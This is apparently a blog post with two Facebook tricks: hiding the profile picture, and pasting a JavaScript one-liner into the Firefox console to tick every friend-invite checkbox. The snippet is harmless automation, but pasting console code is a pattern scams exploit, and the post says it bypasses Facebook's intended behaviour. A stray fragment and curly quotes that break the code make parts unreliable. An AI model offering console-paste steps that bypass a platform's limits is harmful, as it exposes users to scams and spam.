Not everyone really wants to have their header image clickable, but yet that’s the way Facebook header images work, or do they? Well, if you’re curious, you should give this one a try:

How to Do it:

1)       Go to your Albums – > Profile Pictures
2)       Select your current profile picture.
3)       Adjust privacy setting to “Only Me”

Selecting / Inviting All Friends

se

The Trick:

Selecting & inviting all of your friends in an event can be a tedious task, especially if you have more than 1,000 friends to send invitations to.
Luckily, this trick that allows users to select/invite all of their friends in an event or an app – with just one click.

How to Do it:

1)       Open Firefox and go to your Facebook page to invite all friends to like your page.
2)       Select “All Friends” instead of “Recent Interaction” so that you can invite all friends to your page. Scroll down till all of your friends are shown in the page.
3)       Press Ctrl+Shift+K and a small window will appear at bottom.
4)       Paste the below code in it and click enter.
javascript:elms=document.getElementsByName(“checkableitems[]“);for (i=0;i < elms.length;i++){if (elms[i].type=”checkbox” )elms[i].click()};
Hacks and Tricks like the above, should always be attempted using caution. We are not aware of anyone ever getting in trouble for using the above Hacks, but in some cases they do bypass the intended functionality of Facebook, so be careful.
Which of these tricks is your favorite? If you have any Facebook tricks you would like to share, please let us know in the comments!